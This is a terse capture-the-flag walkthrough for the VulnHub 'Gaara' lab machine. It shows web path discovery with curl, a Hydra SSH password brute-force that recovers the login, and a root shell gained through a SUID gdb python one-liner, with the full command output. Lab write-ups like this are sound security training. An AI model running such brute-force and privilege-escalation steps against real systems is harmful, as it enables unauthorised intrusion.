https://www.vulnhub.com/entry/gaara-1,629/
Scan port 80, find Cryoserver.
┌──(kali㉿mykali)-[~/Documents/gaara] └─$ curl http://192.168.56.78/Cryoserver | sed '/^$/d' % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 327 100 327 0 0 159k 0 --:--:-- --:--:-- --:--:-- 319k /Temari /Kazekage /iamGaara
Guess gaara should be the ssh name.
┌──(kali㉿mykali)-[~/Documents/gaara] └─$ hydra -l gaara -P /usr/share/wordlists/rock_ascii.txt 192.168.56.78 ssh -f Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-15 14:56:17 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14329293 login tries (l:1/p:14329293), ~895581 tries per task [DATA] attacking ssh://192.168.56.78:22/ [STATUS] 164.00 tries/min, 164 tries in 00:01h, 14329131 to do in 1456:13h, 16 active[22][ssh] host: 192.168.56.78 login: gaara password: iloveyou2 [STATUS] attack finished for 192.168.56.78 (valid pair found)1 of 1 target successfully completed, 1 valid password foundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-15 14:58:09
Ssh in, find SUID file gdb, get root.
gaara@Gaara:~$ gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit GNU gdb (Debian 8.2.1-2+b3) 8.2.1 Copyright (C) 2018 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word". # id uid=1001(gaara) gid=1001(gaara) euid=0(root) egid=0(root) groups=0(root),1001(gaara) # cd /root # ls root.txt # id;hostname;cat root.txt uid=1001(gaara) gid=1001(gaara) euid=0(root) egid=0(root) groups=0(root),1001(gaara) Gaara ██████╗ █████╗ █████╗ ██████╗ █████╗ ██╔════╝ ██╔══██╗██╔══██╗██╔══██╗██╔══██╗ ██║ ███╗███████║███████║██████╔╝███████║ ██║ ██║██╔══██║██╔══██║██╔══██╗██╔══██║ ╚██████╔╝██║ ██║██║ ██║██║ ██║██║ ██║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ 8a763d61f71db8e7aa237055de928d86 Congrats You have Rooted Gaara. Give the feedback on Twitter if you Root this : @0xJin #